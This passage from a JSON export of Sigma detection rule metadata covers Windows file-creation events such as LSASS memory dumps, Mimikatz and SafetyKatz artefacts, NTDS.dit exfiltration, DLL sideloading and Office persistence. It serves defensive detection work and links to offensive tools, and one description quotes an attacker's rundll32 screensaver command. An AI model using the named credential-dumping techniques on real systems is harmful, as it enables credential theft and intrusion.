- "attack.t1505.003"
- ],
- "creation_date": "2022/10/04",
- "filename": "file_event_win_exchange_webshell_drop_suspicious.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects default lsass dump filename from SafetyKatz",
- "uuid": "e074832a-eada-4fd7-94a1-10642b130e16",
- "value": "SafetyKatz Default Dump Filename",
- "meta": {
- "refs": [
- "https://github.com/GhostPack/SafetyKatz",
- "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ],
- "creation_date": "2018/07/24",
- "filename": "file_event_win_ghostpack_safetykatz.yml",
- "author": "Markus Neis",
- "level": "high",
- "falsepositive": [
- "Rare legitimate files with similar filename structure"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop 
support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
- "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2",
- "value": "GoToAssist Temporary Installation Artefact",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/02/13",
- "filename": "file_event_win_gotoopener_artefact.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory",
- "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8",
- "value": "Dumpert Process Dumper Default File",
- "meta": {
- "refs": [
- "https://github.com/outflanknl/Dumpert",
- "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ],
- "creation_date": "2020/02/04",
- "filename": "file_event_win_hack_dumpert.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Very 
unlikely"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects files written by the different tools that exploit HiveNightmare",
- "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7",
- "value": "Typical HiveNightmare SAM File Export",
- "meta": {
- "refs": [
- "https://github.com/GossiTheDog/HiveNightmare",
- "https://github.com/FireFart/hivenightmare/",
- "https://github.com/WiredPulse/Invoke-HiveNightmare",
- "https://twitter.com/cube0x0/status/1418920190759378944",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1552.001",
- "cve.2021.36934"
- ],
- "creation_date": "2021/07/23",
- "filename": "file_event_win_hivenightmare_file_exports.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Files that accidentally contain these strings"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file",
- "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722",
- "value": "NPPSpy Hacktool Usage",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
- "https://twitter.com/0gtweet/status/1465282548494487554",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml"
- ],
- "tags": [
- "attack.credential_access"
- ],
- "creation_date": "2021/11/29",
- "filename": "file_event_win_hktl_nppspy.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects attempts to create a DLL file to a known 
desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.",
- "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c",
- "value": "Potential Initial Access via DLL Search Order Hijacking",
- "meta": {
- "refs": [
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc",
- "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml"
- ],
- "tags": [
- "attack.t1566",
- "attack.t1566.001",
- "attack.initial_access",
- "attack.t1574",
- "attack.t1574.001",
- "attack.defense_evasion"
- ],
- "creation_date": "2022/10/21",
- "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml",
- "author": "Tim Rauch (rule), Elastic (idea)",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "TeamViewer_Desktop.exe is create during install",
- "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d",
- "value": "Installation of TeamViewer Desktop",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/01/28",
- "filename": "file_event_win_install_teamviewer_desktop.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- 
}
- },
- {
- "description": "Detects the presence and execution of Inveigh via dropped artefacts",
- "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449",
- "value": "Inveigh Execution Artefacts",
- "meta": {
- "refs": [
- "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs",
- "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/10/24",
- "filename": "file_event_win_inveigh_artefacts.yml",
- "author": "Nasreddine Bencherchali",
- "level": "critical",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\u201ciphlpapi.dll\u201d) is sideloaded\n",
- "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163",
- "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder",
- "meta": {
- "refs": [
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.defense_evasion",
- "attack.t1574.002"
- ],
- "creation_date": "2022/08/12",
- "filename": "file_event_win_iphlpapi_dll_sideloading.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": 
"Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.",
- "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb",
- "value": "ISO File Created Within Temp Folders",
- "meta": {
- "refs": [
- "https://twitter.com/Sam0x90/status/1552011547974696960",
- "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1566.001"
- ],
- "creation_date": "2022/07/30",
- "filename": "file_event_win_iso_file_mount.yml",
- "author": "@sam0x90",
- "level": "high",
- "falsepositive": [
- "Potential FP by sysadmin opening a zip file containing a legitimate ISO file"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n",
- "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b",
- "value": "ISO or Image Mount Indicator in Recent Files",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
- "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/",
- "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/02/11",
- "filename": 
"file_event_win_iso_file_recent.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Cases in which a user mounts an image file for legitimate reasons"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects programs on a Windows system that should not write an archive to disk",
- "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26",
- "value": "Legitimate Application Dropped Archive",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ],
- "creation_date": "2022/08/21",
- "filename": "file_event_win_legitimate_app_dropping_archive.yml",
- "author": "frack113, Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects programs on a Windows system that should not write executables to disk",
- "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc",
- "value": "Legitimate Application Dropped Executable",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ],
- "creation_date": "2022/08/21",
- "filename": "file_event_win_legitimate_app_dropping_exe.yml",
- "author": "frack113, Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects programs on a Windows system that should not write 
scripts to disk", - "uuid": "7d604714-e071-49ff-8726-edeb95a70679", - "value": "Legitimate Application Dropped Script", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/21", - "filename": "file_event_win_legitimate_app_dropping_script.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "value": "LSASS Process Memory Dump Files", - "meta": { - "refs": [ - "https://www.google.com/search?q=procdump+lsass", - "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://github.com/helpsystems/nanodump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/11/15", - "filename": "file_event_win_lsass_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", - "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "value": "LSASS Memory Dump File Creation", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/22", - "filename": "file_event_win_lsass_memory_dump_file_creation.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "high", - "falsepositive": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "value": "WerFault LSASS Process Memory Dump", - "meta": { - "refs": [ - "https://github.com/helpsystems/nanodump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/06/27", - "filename": "file_event_win_lsass_werfault_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "A office file with macro is created from a commandline or a script", - "uuid": "b1c50487-1967-4315-a026-6491686d860e", - "value": "Dump Office Macro Files from Commandline", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2022/01/23", - "filename": "file_event_win_macro_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "value": "Adwind RAT / JRAT File Artifact", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2017/11/10", - "filename": "file_event_win_mal_adwind.yml", - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Octopus Scanner Malware.", - "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", - "value": "Octopus Scanner Malware", - "meta": { - "refs": [ - "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" - ], - "tags": [ 
- "attack.t1195", - "attack.t1195.001" - ], - "creation_date": "2020/06/09", - "filename": "file_event_win_mal_octopus_scanner.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", - "value": "Suspicious VHD Image Download From Browser", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2021/10/25", - "filename": "file_event_win_mal_vhd_download.yml", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "medium", - "falsepositive": [ - "Legitimate user creation" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", - "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", - "value": "Mimikatz Kirbi File Creation", - "meta": { - "refs": [ - "https://cobalt.io/blog/kerberoast-attack-techniques", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558" - ], - "creation_date": "2021/11/08", - "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": 
"file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Mimikatz MemSSP default log file creation", - "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", - "value": "Mimikatz MemSSP Default Log File Creation", - "meta": { - "refs": [ - "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2021/12/20", - "filename": "file_event_win_mimimaktz_memssp_log_file.yml", - "author": "David ANDRE", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "value": "Moriya Rootkit", - "meta": { - "refs": [ - "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2021/05/06", - "filename": "file_event_win_moriya_rootkit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects msdt.exe creating files in suspicious directories", - "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", - "value": "MSDT.exe Creates Files in Autorun Directory", - "meta": { - "refs": [ - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" - ], - "creation_date": "2022/08/24", - "filename": "file_event_win_msdt_autorun.yml", - "author": "Vadim Varganov, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", - "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "value": "NET CLR Binary Execution Usage Log Artifact", - "meta": { - "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/11/18", - "filename": "file_event_win_net_cli_artefact.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "value": "Creation Suspicious File In Uncommon AppData Folder", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/08/05", - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", - "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", - "value": "SCR File Write Event", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" - ], - "tags": [ - "attack.t1218.011", - "attack.defense_evasion" - ], - "creation_date": "2022/04/27", - "filename": "file_event_win_new_src_file.yml", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "The installation of new screen savers." - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", - "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "value": "Persistence Via Notepad++ Plugins", - "meta": { - "refs": [ - "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/06/10", - "filename": "file_event_win_notepad_plus_plus_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins to enhance notepad++ functionality by users" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", - "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "value": "Suspicious NTDS.DIT Creation", - "meta": { - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/11", - "filename": "file_event_win_ntds_dit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - 
"uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "value": "Suspicious NTDS Exfil Filename Patterns", - "meta": { - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", - "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/11", - "filename": "file_event_win_ntds_exfil_tools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", - "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "value": "Microsoft Office Add-In Loading", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], - "creation_date": "2020/05/11", - "filename": "file_event_win_office_persistence.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Legitimate add-ins" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a macro file for Outlook.\nGoes with win_outlook_c2_registry_key. 
VbaProject.OTM is explicitly mentioned in T1137.\nParticularly interesting if both events Registry & File Creation happens at the same time.\n", - "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", - "value": "Outlook C2 Macro Creation", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_c2_macro_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" - ], - "creation_date": "2021/04/05", - "filename": "file_event_win_outlook_c2_macro_creation.yml", - "author": "@ScoubiMtl", - "level": "medium", - "falsepositive": [ - "User genuinly creates a VB Macro for their email" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of new Outlook form which can contain malicious code", - "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "value": "Outlook Form Installation", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.003" - ], - "creation_date": "2021/06/10", - "filename": "file_event_win_outlook_newform.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes creating temp files related to PCRE.NET package", - "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", - "value": "PCRE.NET Package Temp Files", - "meta": { - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - 
